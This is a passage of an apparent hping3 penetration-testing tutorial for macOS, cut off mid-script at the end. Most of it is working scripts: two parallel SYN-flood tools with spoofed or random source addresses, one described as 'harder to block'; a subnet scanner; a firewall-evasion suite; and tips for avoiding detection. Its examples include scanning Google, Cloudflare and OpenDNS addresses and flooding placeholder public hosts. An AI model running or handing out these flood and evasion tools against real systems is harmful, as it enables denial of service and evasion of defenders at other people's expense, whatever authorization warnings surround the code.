    while [ $completed -lt $processes ]; do
        completed=0
        for pid in "${pids[@]}"; do
            if ! kill -0 $pid 2>/dev/null; then
                ((completed++))
            fi
        done
        
        echo "📈 Progress: $completed/$processes processes completed"
        sleep 2
    done
    
    echo "🎯 SYN flood attack completed!"
    echo "📋 Logs saved in: $log_dir"
    echo "🧹 Clean up logs with: rm -rf $log_dir"
}

# Check if script is being sourced or executed directly
if [[ "${(%):-%x}" == "${0}" ]]; then
    syn_flood_attack "$@"
fi
EOF

chmod +x ./syn_flood_attack.sh

How to Run:

# Basic Usage Syntax:
./syn_flood_attack.sh <target> <port> <packet_count> <processes>

# 1. Test against a local test server (SAFE)
# Send 1000 SYN packets to localhost port 8080 using 4 parallel processes
./syn_flood_attack.sh localhost 8080 1000 4

# 2. Test your own web server
# Send 5000 packets to your own server on port 80 using 10 processes
./syn_flood_attack.sh your-test-server.com 80 5000 10

# 3. Small-scale test
# Send only 100 packets using 2 processes for minimal testing
./syn_flood_attack.sh 127.0.0.1 3000 100 2

# 4. Stress test with more packets
# Send 10000 packets to port 443 using 20 parallel processes
./syn_flood_attack.sh test.example.local 443 10000 20

# 5. Create a decoy attack using random IP addresses from a specified CIDR block. This has the highest potential to cause harm. Authorised use only!
./syn_flood_attack.sh target.com 80 1000 4 192.168.0.0/16
./syn_flood_attack.sh target.com 80 1000 4 10.0.0.0/8

# Parameters:
# <target>: IP address or hostname (localhost, 192.168.1.100, test-server.local)
# <port>: Target port number (80 for HTTP, 443 for HTTPS, 22 for SSH)
# <packet_count>: Total number of SYN packets to send (1000, 5000, etc.)
# <processes>: Number of parallel hping3 processes to use (4, 10, etc.)

Example Output:

 ./syn_flood_attack.sh localhost 8080 1000 4

==========================================
           SYN FLOOD ATTACK
==========================================
Target: localhost:8080
Total packets: 1000
Processes: 4
Packets per process: 250

⚠️  WARNING: This will perform a SYN flood attack!
⚠️  Only use on systems you own or have explicit permission to test!
⚠️  Unauthorized DoS attacks are illegal!

Do you have authorization to test this target? (type 'YES' to continue): YES
✅ Starting SYN flood with 4 processes...
📊 Monitor system resources during attack
🚀 Starting process 1 with 250 packets
🚀 Starting process 2 with 250 packets
🚀 Starting process 3 with 250 packets
🚀 Starting process 4 with 250 packets
⏳ Waiting for all processes to complete...
💡 You can monitor progress with: tail -f /tmp/syn_flood_20250923_114710/process_*.log

Safety Features:
– Explicit authorization confirmation required
– Process monitoring and logging
– Progress tracking with visual indicators
– Automatic log cleanup instructions

Parameters Explained:
**target**: Target hostname/IP address
**port**: Target port number
**packet_count**: Total packets to send
**processes**: Number of parallel processes
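
The split across processes is plain integer division, with any remainder handed to the last process (as the script does internally); a standalone sketch of the arithmetic with illustrative numbers:

packet_count=1003
processes=4
per_process=$((packet_count / processes))    # 250
remainder=$((packet_count % processes))      # 3
echo "Processes 1-3 send $per_process packets each; process 4 sends $((per_process + remainder))"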

Script 9: Comprehensive Network Discovery

Purpose:
Performs comprehensive network discovery combining ICMP and TCP techniques to map active hosts and services across a network range.

Create the Script:

cat > ./network_discovery.sh << 'EOF'
#!/bin/zsh

network_discovery() {
    local network=$1
    local start_ip=${2:-1}
    local end_ip=${3:-254}
    local test_ports=${4:-"22,80,443"}
    
    if [ -z "$network" ]; then
        echo "Usage: network_discovery <network> [start_ip] [end_ip] [test_ports]"
        echo "Example: network_discovery 192.168.1 1 100 '22,80,443,8080'"
        return 1
    fi
    
    echo "🔍 Comprehensive Network Discovery"
    echo "=================================="
    echo "Network: $network.$start_ip-$end_ip"
    echo "Test ports: $test_ports"
    echo ""
    
    # Create results directory
    local results_dir="/tmp/network_discovery_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$results_dir"
    
    # Phase 1: ICMP Discovery
    echo "📡 Phase 1: ICMP Host Discovery"
    echo "==============================="
    local icmp_results="$results_dir/icmp_results.txt"
    
    for i in $(seq $start_ip $end_ip); do
        (hping3 -1 -c 1 $network.$i 2>&1 | grep -E "(bytes from|icmp.*seq=)" && echo "$network.$i" >> "$icmp_results") &
        
        # Limit concurrent processes on macOS
        if (( i % 20 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$icmp_results" ]; then
        echo "✅ ICMP-responsive hosts:"
        cat "$icmp_results" | while read host; do
            echo "  - $host [ICMP]"
        done
    else
        echo "❌ No ICMP-responsive hosts found"
    fi
    
    echo ""
    
    # Phase 2: TCP Discovery
    echo "🚪 Phase 2: TCP Port Discovery"
    echo "=============================="
    local tcp_results="$results_dir/tcp_results.txt"
    
    # Zsh-compatible array splitting
    PORT_ARRAY=(${(s:,:)test_ports})
    
    for i in $(seq $start_ip $end_ip); do
        for port in "${PORT_ARRAY[@]}"; do
            (hping3 -S -p $port -c 1 $network.$i 2>&1 | grep "flags=SA" && echo "$network.$i:$port" >> "$tcp_results") &
        done
        
        # Limit concurrent processes
        if (( i % 10 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$tcp_results" ]; then
        echo "✅ TCP-responsive hosts and ports:"
        cat "$tcp_results" | while read host_port; do
            echo "  - $host_port [TCP]"
        done
    else
        echo "❌ No TCP-responsive hosts found"
    fi
    
    echo ""
    echo "📊 Discovery Summary"
    echo "==================="
    echo "Results saved in: $results_dir"
    echo "ICMP hosts: $([ -s "$icmp_results" ] && wc -l < "$icmp_results" || echo 0)"
    echo "TCP services: $([ -s "$tcp_results" ] && wc -l < "$tcp_results" || echo 0)"
    echo ""
    echo "🧹 Clean up with: rm -rf $results_dir"
}

# Zsh-compatible check for direct execution
if [[ "${(%):-%N}" == "${0}" ]] || [[ "$ZSH_EVAL_CONTEXT" == "toplevel" ]]; then
    network_discovery "$@"
fi
EOF

chmod +x ./network_discovery.sh

How to Run:

# Basic Usage - Scan entire subnet with default ports (22,80,443)
./network_discovery.sh 192.168.1

# Scan hosts .1 to .50 with the default ports
./network_discovery.sh 192.168.1 1 50

# Scan hosts .1 to .100 with a custom port list
./network_discovery.sh 192.168.1 1 100 '22,80,443,8080,3306'

# Home Network Scans
./network_discovery.sh 192.168.1 1 20 '80,443'                    # Router and devices
./network_discovery.sh 192.168.0 1 30 '22,80,443,8080'           # Alternative subnet
./network_discovery.sh 10.0.0 1 50 '22,80,443,3389,445'          # Corporate network range

# Service-Specific Discovery
./network_discovery.sh 192.168.1 1 254 '80,443,8080,8443'        # Web servers only
./network_discovery.sh 192.168.1 1 100 '22'                       # SSH servers only
./network_discovery.sh 10.0.0 1 50 '3306,5432,27017,6379'        # Database servers
./network_discovery.sh 192.168.1 1 100 '445,3389,139'            # Windows machines
./network_discovery.sh 192.168.1 1 50 '3000,5000,8000,9000'      # Dev servers

# Quick Targeted Scans
./network_discovery.sh 192.168.1 1 10                             # First 10 IPs, default ports
./network_discovery.sh 192.168.1 100 100 '21,22,23,25,80,110,443,445,3306,3389,5900,8080'  # Single host, many ports
./network_discovery.sh 172.16.0 1 30 '80,443'                    # Fast web discovery

# Your Local Network (based on your IP: 10.223.23.133)
./network_discovery.sh 10.223.23 130 140 '22,80,443'             # Scan near your IP
./network_discovery.sh 10.223.23 1 254 '80,443'                  # Full subnet web scan
./network_discovery.sh 10.223.23 133 133 '21,22,25,53,80,110,143,443,445,3306,3389,5432,8080'  # Many common ports on your IP (the script expects a comma-separated list, not ranges)

# Localhost Testing
./network_discovery.sh 127.0.0 1 1 '22,80,443,3000,8080'         # Test on localhost

# Advanced Usage with sudo (for better ICMP results)
sudo ./network_discovery.sh 192.168.1 1 50
sudo ./network_discovery.sh 10.223.23 130 140 '22,80,443,8080'

# Comprehensive port scan
./network_discovery.sh 192.168.1 1 20 '21,22,23,25,53,80,110,143,443,445,993,995,1433,3306,3389,5432,5900,6379,8080,8443,27017'

# Chain with other commands
./network_discovery.sh 192.168.1 1 10 && echo "Scan complete"
./network_discovery.sh 192.168.1 1 20 '22' | tee scan_results.txt

# View and manage results
ls -la /tmp/network_discovery_*                                   # List all scan results
cat /tmp/network_discovery_*/icmp_results.txt                     # View ICMP results
cat /tmp/network_discovery_*/tcp_results.txt                      # View TCP results
rm -rf /tmp/network_discovery_*                                   # Clean up all results

### LOCAL MACHINE EXAMPLE
# Targeting your local machine and common services. First, check which services are listening on your machine:
netstat -an | grep LISTEN | grep -E '\.([0-9]+)\s' | awk '{print $4}' | sed 's/.*\.//' | sort -u | head -20
18313
5000
53
55296
61611
65535
7000
9000
9010
9277

### Check your actual IP address to create working examples:
ifconfig | grep "inet " | grep -v 127.0.0.1 | awk '{print $2}' | head -1
10.223.23.133
### Now let's test with your actual IP and the ports that are listening. Note that hping3 often needs sudo privileges for proper ICMP and TCP SYN scanning:
sudo ./network_discovery.sh 10.223.23 133 133 '5000,7000,9000,9010,53'


### EXAMPLES LIKELY TO RETURN SUCCESSFUL RESULTS (well-known, highly available targets)

# 1. Scan Google's servers (known to respond)
sudo ./network_discovery.sh 142.251.216 78 78 '80,443'
sudo ./network_discovery.sh 142.251.216 1 10 '80,443'

# 2. Scan Cloudflare DNS (highly available)
sudo ./network_discovery.sh 1.1.1 1 1 '53,80,443'
sudo ./network_discovery.sh 1.0.0 1 1 '53,80,443'

# 3. Scan popular DNS servers
sudo ./network_discovery.sh 8.8.8 8 8 '53,443'              # Google DNS
sudo ./network_discovery.sh 8.8.4 4 4 '53,443'              # Google DNS secondary
sudo ./network_discovery.sh 208.67.222 222 222 '53,443'     # OpenDNS

# 4. Scan your local gateway (should respond on some ports)
sudo ./network_discovery.sh 10.223.22 1 1 '80,443,22,53,8080'

# 5. Scan your local subnet for common services
sudo ./network_discovery.sh 10.223.23 1 10 '22,80,443,445,3389,5900'
sudo ./network_discovery.sh 10.223.23 130 140 '80,443,22,3389'

# 6. Quick test with well-known servers
sudo ./network_discovery.sh 93.184.216 34 34 '80,443'      # example.com
sudo ./network_discovery.sh 104.17.113 106 106 '80,443'    # Cloudflare IP

# 7. Scan for web servers in your network
sudo ./network_discovery.sh 10.223.23 1 254 '80,443'

# 8. Multiple reliable targets in one scan
sudo ./network_discovery.sh 1.1.1 1 2 '53,80,443'          # Cloudflare DNS range

# 9. Test against localhost services (based on your running ports)
sudo ./network_discovery.sh 127.0.0 1 1 '5000,7000,9000,9010,53'

# 10. Comprehensive scan of known responsive range
sudo ./network_discovery.sh 142.251.216 70 80 '80,443,22'

Parameters Explained:
**network** (required): Network base (e.g., “192.168.1”)
**start_ip** (optional, default: 1): Starting host number
**end_ip** (optional, default: 254): Ending host number
**test_ports** (optional, default: “22,80,443”): Comma-separated port list

Discovery Phases:
1. **ICMP Discovery**: Tests basic connectivity with ping
2. **TCP Discovery**: Tests specific services on each host
3. **Results Analysis**: Provides comprehensive summary
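
Per host, the first two phases reduce to one ICMP echo plus one TCP SYN per candidate port; issued manually they look roughly like this (the IP and port are placeholders):

# Phase 1: ICMP echo request; any reply marks the host as live
sudo hping3 -1 -c 1 192.168.1.10

# Phase 2: TCP SYN to a candidate service; a "flags=SA" reply marks the port as open
sudo hping3 -S -p 443 -c 1 192.168.1.10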

Script 10: Firewall Evasion Test Suite

Purpose:
Performs a comprehensive battery of firewall evasion techniques to test security controls and identify potential bypass methods.

Create the Script:

cat > ./firewall_evasion_test.sh << 'EOF'
#!/bin/zsh

firewall_evasion_test() {
    local target=$1
    local port=${2:-80}
    
    if [ -z "$target" ]; then
        echo "Usage: firewall_evasion_test  [port]"
        echo "Example: firewall_evasion_test example.com 443"
        return 1
    fi
    
    echo "🛡️ Comprehensive Firewall Evasion Test Suite"
    echo "============================================="
    echo "Target: $target:$port"
    echo "Testing multiple evasion techniques..."
    echo ""
    
    # Test 1: Normal SYN scan (baseline)
    echo "🔍 Test 1: Normal SYN Scan (Baseline)"
    echo "====================================="
    result1=$(hping3 -S -p $port -c 1 $target 2>&1)
    echo "$result1"
    if echo "$result1" | grep -q "flags=SA"; then
        echo "✅ BASELINE: Port appears OPEN"
    else
        echo "❌ BASELINE: Port appears CLOSED/FILTERED"
    fi
    echo ""
    
    # Test 2: Source port 53 (DNS)
    echo "🔍 Test 2: DNS Source Port Spoofing (53)"
    echo "========================================"
    result2=$(hping3 -S -p $port -s 53 -c 1 $target 2>&1)
    echo "$result2"
    if echo "$result2" | grep -q "flags=SA"; then
        echo "✅ DNS SPOOF: Bypass successful!"
    else
        echo "❌ DNS SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 3: Source port 20 (FTP-DATA)
    echo "🔍 Test 3: FTP-DATA Source Port Spoofing (20)"
    echo "=============================================="
    result3=$(hping3 -S -p $port -s 20 -c 1 $target 2>&1)
    echo "$result3"
    if echo "$result3" | grep -q "flags=SA"; then
        echo "✅ FTP SPOOF: Bypass successful!"
    else
        echo "❌ FTP SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 4: Fragmented packets
    echo "🔍 Test 4: Packet Fragmentation"
    echo "==============================="
    result4=$(hping3 -S -p $port -f -c 1 $target 2>&1)
    echo "$result4"
    if echo "$result4" | grep -q "flags=SA"; then
        echo "✅ FRAGMENTATION: Bypass successful!"
    else
        echo "❌ FRAGMENTATION: No bypass detected"
    fi
    echo ""
    
    # Test 5: FIN scan
    echo "🔍 Test 5: FIN Scan Evasion"
    echo "==========================="
    result5=$(hping3 -F -p $port -c 1 $target 2>&1)
    echo "$result5"
    if ! echo "$result5" | grep -q "flags=R" && ! echo "$result5" | grep -q "ICMP"; then
        echo "✅ FIN SCAN: Potential bypass (no response)"
    else
        echo "❌ FIN SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 6: NULL scan
    echo "🔍 Test 6: NULL Scan Evasion"
    echo "============================"
    result6=$(hping3 -p $port -c 1 $target 2>&1)
    echo "$result6"
    if ! echo "$result6" | grep -q "flags=R" && ! echo "$result6" | grep -q "ICMP"; then
        echo "✅ NULL SCAN: Potential bypass (no response)"
    else
        echo "❌ NULL SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 7: XMAS scan
    echo "🔍 Test 7: XMAS Scan Evasion"
    echo "============================"
    result7=$(hping3 -F -P -U -p $port -c 1 $target 2>&1)
    echo "$result7"
    if ! echo "$result7" | grep -q "flags=R" && ! echo "$result7" | grep -q "ICMP"; then
        echo "✅ XMAS SCAN: Potential bypass (no response)"
    else
        echo "❌ XMAS SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 8: Random source addresses
    echo "🔍 Test 8: Random Source Address"
    echo "================================"
    # Note: with --rand-source the SYN/ACK replies go back to the spoofed addresses, so "flags=SA" will rarely
    # be seen here; this test mainly shows whether obviously spoofed traffic is dropped outright
    result8=$(hping3 -S -p $port --rand-source -c 3 $target 2>&1)
    echo "$result8"
    if echo "$result8" | grep -q "flags=SA"; then
        echo "✅ RANDOM SOURCE: Bypass successful!"
    else
        echo "❌ RANDOM SOURCE: No bypass detected"
    fi
    echo ""
    
    # Summary
    echo "📊 Evasion Test Summary"
    echo "======================="
    echo "Target: $target:$port"
    echo "Tests completed: 8"
    echo ""
    echo "Potential bypasses detected:"
    [[ "$result2" =~ "flags=SA" ]] && echo "  ✅ DNS source port spoofing"
    [[ "$result3" =~ "flags=SA" ]] && echo "  ✅ FTP-DATA source port spoofing"
    [[ "$result4" =~ "flags=SA" ]] && echo "  ✅ Packet fragmentation"
    [[ ! "$result5" =~ "flags=R" && ! "$result5" =~ "ICMP" ]] && echo "  ✅ FIN scan stealth"
    [[ ! "$result6" =~ "flags=R" && ! "$result6" =~ "ICMP" ]] && echo "  ✅ NULL scan stealth"
    [[ ! "$result7" =~ "flags=R" && ! "$result7" =~ "ICMP" ]] && echo "  ✅ XMAS scan stealth"
    [[ "$result8" =~ "flags=SA" ]] && echo "  ✅ Random source addressing"
    
    echo ""
    echo "🔒 Recommendations:"
    echo "  - Review firewall rules for source port filtering"
    echo "  - Enable stateful packet inspection"
    echo "  - Configure fragment reassembly"
    echo "  - Monitor for stealth scan patterns"
}

if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
    firewall_evasion_test "$@"
fi
EOF

chmod +x ./firewall_evasion_test.sh

How to Run:


# Test firewall evasion on port 80
sudo ./firewall_evasion_test.sh example.com

# Test firewall evasion on HTTPS port
sudo ./firewall_evasion_test.sh example.com 443

Evasion Techniques Tested:
1. **Baseline SYN scan**: Normal connection attempt
2. **DNS source port spoofing**: Uses port 53 as source
3. **FTP-DATA source port spoofing**: Uses port 20 as source
4. **Packet fragmentation**: Splits packets to evade inspection
5. **FIN scan**: Uses FIN flag for stealth
6. **NULL scan**: No flags set for evasion
7. **XMAS scan**: Multiple flags for confusion
8. **Random source addressing**: Obscures attack origin
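
The suite simply wraps the corresponding raw hping3 probes; a few of them issued by hand look roughly like this (target and port are placeholders):

sudo hping3 -S -p 80 -c 1 target.example.com           # 1. Baseline SYN
sudo hping3 -S -p 80 -s 53 -c 1 target.example.com     # 2. DNS source port (53)
sudo hping3 -S -p 80 -f -c 1 target.example.com        # 4. Fragmented SYN
sudo hping3 -F -p 80 -c 1 target.example.com           # 5. FIN scan
sudo hping3 -F -P -U -p 80 -c 1 target.example.com     # 7. XMAS (FIN + PSH + URG)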

Important Usage Notes:

macOS-Specific Considerations:
– **Root privileges required**: Most scripts need `sudo` for raw socket access
– **Process limits**: macOS limits concurrent processes, scripts include throttling
– **Firewall interference**: macOS firewall may block outgoing packets
– **Network interfaces**: Scripts auto-detect primary interface
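
To confirm which interface carries your default route before a scan, and to hand it to hping3 explicitly if auto-detection picks the wrong one, something like this works on macOS (en0 below is only an example):

# Show the interface used for the default route
route -n get default | awk '/interface:/ {print $2}'

# Force hping3 to use that interface
sudo hping3 -I en0 -S -p 80 -c 1 example.com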

Performance Optimization:
– Use appropriate delays to avoid overwhelming targets
– Limit concurrent processes on macOS (typically 20-50)
– Monitor system resources during intensive scans
– Use temporary files for result collection
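
The throttling pattern the scripts use is simply "launch probes in the background, wait after each batch"; a minimal sketch, with the batch size as a tunable assumption:

batch=20
for i in $(seq 1 254); do
    (sudo hping3 -1 -c 1 192.168.1.$i > /dev/null 2>&1) &
    # Pause after every $batch background probes so macOS process limits are not hit
    if (( i % batch == 0 )); then
        wait
    fi
done
wait    # catch the final partial batch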

Detection Avoidance:

# Slow scanning to avoid detection
sudo ./tcp_syn_scan.sh example.com 1 100 5

# Minimal, single-probe checks (less likely to trigger rate-based detection)
sudo ./source_port_scan.sh example.com 80 53 1

Integration with Other Tools:

# Combine with nmap for verification
sudo ./common_ports_scan.sh example.com
nmap -sS example.com

# Use with tcpdump for packet analysis
sudo tcpdump -i en0 host example.com &
sudo ./tcp_syn_ping.sh example.com

Troubleshooting Common Issues:

Permission Denied:


# Solution: Use sudo for raw socket access
sudo ./script_name.sh

Command Not Found:


# Solution: Verify hping3 installation
brew install hping
which hping3

Network Interface Issues:


# Solution: Specify interface manually
hping3 -I en0 -S -p 80 example.com

Script Debugging:


# Enable verbose output
set -x
source ./script_name.sh

# Check script syntax
zsh -n ./script_name.sh

Legal and Ethical Guidelines:

Before You Begin:
– ✅ Obtain written authorization from system owners
– ✅ Define clear scope and boundaries
– ✅ Establish communication channels
– ✅ Plan for incident response
– ✅ Document all activities

During Testing:
– 🔍 Monitor system impact continuously
– ⏸️ Stop immediately if unauthorized access is gained
– 📝 Document all findings and methods
– 🚫 Do not access or modify data
– ⚠️ Report critical vulnerabilities promptly

After Testing:
– 📋 Provide comprehensive reports
– 🗑️ Securely delete all collected data
– 🤝 Follow responsible disclosure practices
– 📚 Share lessons learned (with permission)

Conclusion

This comprehensive hping3 guide provides 10 essential penetration testing scripts specifically optimized for macOS systems. Each script includes detailed explanations, parameter descriptions, and practical examples using example.com as the target.

Key Takeaways:
– **Authorization is mandatory** – Never test without explicit permission
– **macOS optimization** – Scripts include platform-specific considerations
– **Comprehensive coverage** – From basic discovery to advanced evasion
– **Safety features** – Built-in protections and confirmation prompts
– **Educational value** – Detailed explanations for learning

Next Steps:
1. Set up your macOS environment with the installation steps
2. Create the script directory and download the scripts
3. Practice on authorized targets or lab environments
4. Integrate with other security tools for comprehensive testing
5. Develop your own custom scripts based on these examples

Remember: These tools are powerful and should be used responsibly. Always prioritize ethical considerations and legal compliance in your security testing activities.

Official Documentation:
– [hping3 Official Website](http://www.hping.org/)
– [hping3 Manual Page](https://linux.die.net/man/8/hping3)

Related Tools:
– **nmap**: Network discovery and port scanning
– **masscan**: High-speed port scanner
– **zmap**: Internet-wide network scanner
– **tcpdump**: Packet capture and analysis

Learning Resources:
– OWASP Testing Guide
– NIST Cybersecurity Framework
– CEH (Certified Ethical Hacker) materials
– OSCP (Offensive Security Certified Professional) training

Script Summary Table:

| Script | Purpose | Key Features |
|--------|---------|--------------|
| `icmp_ping.sh` | Basic host discovery | ICMP connectivity testing |
| `icmp_sweep.sh` | Network enumeration | Bulk host discovery |
| `tcp_syn_ping.sh` | Firewall-resistant discovery | TCP-based host detection |
| `tcp_syn_scan.sh` | Port scanning | Stealth SYN scanning |
| `common_ports_scan.sh` | Service discovery | Predefined port lists |
| `fin_scan.sh` | Stealth scanning | FIN flag evasion |
| `source_port_scan.sh` | Firewall bypass | Source port spoofing |
| `syn_flood_attack.sh` | DoS testing | Multi-process flooding |
| `network_discovery.sh` | Comprehensive recon | Combined techniques |
| `firewall_evasion_test.sh` | Security testing | Multiple evasion methods |

This guide provides everything needed to perform professional-grade penetration testing with hping3 on macOS systems while maintaining ethical and legal standards.

Testing your site's SYN flood resistance using hping3 in parallel

A SYN flood test with hping3 that lets you specify the total number of SYN packets and fan the work out across a configurable number of processes can be built as a Bash script around the xargs command. Distributing the workload across multiple processes improves throughput over a single hping3 instance.
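
The fan-out itself is just seq feeding xargs -P; swapping hping3 for echo shows the pattern harmlessly:

# Four parallel workers, each handed one token from seq
seq 1 4 | xargs -I {} -P 4 bash -c 'echo "worker {} started (pid $$)"; sleep 1'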

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash

# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.

# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified

# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
    echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
    echo ""
    echo "Parameters:"
    echo "  TARGET_IP           - Target IP address or hostname"
    echo "  TARGET_PORT         - Target port number (1-65535)"
    echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
    echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
    echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
    echo ""
    echo "Examples:"
    echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
    echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
    echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
    exit 1
fi

# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"

# Calculate packets per process (integer division; any remainder is dropped, so the total actually sent may be slightly below PACKET_COUNT_TOTAL)
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))

# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
    echo "Using randomized source IPs (--rand-source)"
    # Use seq and xargs to parallelize the hping3 command with random source IPs
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
    echo "Using actual source IP (no randomization)"
    # Use seq and xargs to parallelize the hping3 command without source randomization
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi

echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"

EOF

chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4

# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true

# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false

# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true

# Test without IP randomization (easier to trace/debug)
./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (--rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)
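
To confirm what actually leaves the machine, and whether the source addresses really are randomized, capture the outgoing SYNs while the test runs; the interface (en0) and the target values here are assumptions to adjust:

# Show only outgoing SYN packets towards the target during the test
sudo tcpdump -n -i en0 'tcp[tcpflags] & tcp-syn != 0 and dst host 192.168.1.1 and dst port 80'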

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

MacBook: Useful/basic Nmap script to check for vulnerabilities and create a formatted report

If you want a quick health check of your website, the following simple Nmap-based script scans your site for common issues and formats the results as a readable report.

#!/bin/bash

# Nmap Vulnerability Scanner with Severity Grouping, TLS checks, and Directory Discovery
# Usage: ./vunscan.sh <target_domain>

# Colors for output
RED='\033[0;31m'
ORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color

# Check if target is provided
if [ $# -eq 0 ]; then
    echo "Usage: $0 <target_domain>"
    echo "Example: $0 example.com"
    exit 1
fi

TARGET=$1
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="vuln_scan_${TARGET}_${TIMESTAMP}"
RAW_OUTPUT="${OUTPUT_DIR}/raw_scan.xml"
OPEN_PORTS=""

# Debug output
echo "DEBUG: TARGET=$TARGET"
echo "DEBUG: TIMESTAMP=$TIMESTAMP"
echo "DEBUG: OUTPUT_DIR=$OUTPUT_DIR"
echo "DEBUG: RAW_OUTPUT=$RAW_OUTPUT"

# Create output directory
mkdir -p "$OUTPUT_DIR"
if [ ! -d "$OUTPUT_DIR" ]; then
    echo -e "${RED}Error: Failed to create output directory $OUTPUT_DIR${NC}"
    exit 1
fi

echo "================================================================"
echo "         Vulnerability Scanner for $TARGET"
echo "================================================================"
echo "Scan started at: $(date)"
echo "Results will be saved in: $OUTPUT_DIR"
echo ""

# Function to print section headers
print_header() {
    echo -e "\n${BLUE}================================================================${NC}"
    echo -e "${BLUE}$1${NC}"
    echo -e "${BLUE}================================================================${NC}"
}

# Function to run nmap scan
run_scan() {
    print_header "Running Comprehensive Vulnerability Scan"
    echo "This may take several minutes…"
    
    # First, determine which ports are open
    echo "Phase 1: Port discovery..."
    echo "Scanning for open ports (this may take a while)..."
    
    # Try a faster scan first on common ports
    nmap -p 1-1000,8080,8443,3306,5432,27017 --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null
    
    # If user wants full scan, uncomment the next line and comment the previous one
    # nmap -p- --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports.txt" 2>/dev/null
    
    # Extract open ports
    if [ -f "${OUTPUT_DIR}/open_ports_quick.txt" ]; then
        OPEN_PORTS=$(grep -oE '[0-9]+/open' "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
    fi
    
    # If no ports found, try common web ports
    if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
        echo -e "${YELLOW}Warning: No open ports found in quick scan. Checking common web ports...${NC}"
        
        # Test common ports individually
        COMMON_PORTS="80,443,8080,8443,22,21,25,3306,5432"
        OPEN_PORTS=""
        
        for port in $(echo $COMMON_PORTS | tr ',' ' '); do
            echo -n "Testing port $port... "
            if nmap -p $port --open "$TARGET" 2>/dev/null | grep -q "open"; then
                echo "open"
                if [ -z "$OPEN_PORTS" ]; then
                    OPEN_PORTS="$port"
                else
                    OPEN_PORTS="$OPEN_PORTS,$port"
                fi
            else
                echo "closed/filtered"
            fi
        done
    fi
    
    # Final fallback
    if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
        echo -e "${YELLOW}Warning: No open ports detected. Using default web ports for scanning.${NC}"
        OPEN_PORTS="80,443"
    fi
    
    echo ""
    echo "Ports to scan: $OPEN_PORTS"
    echo ""
    
    # Main vulnerability scan with http-vulners-regex
    echo "Phase 2: Vulnerability scanning..."
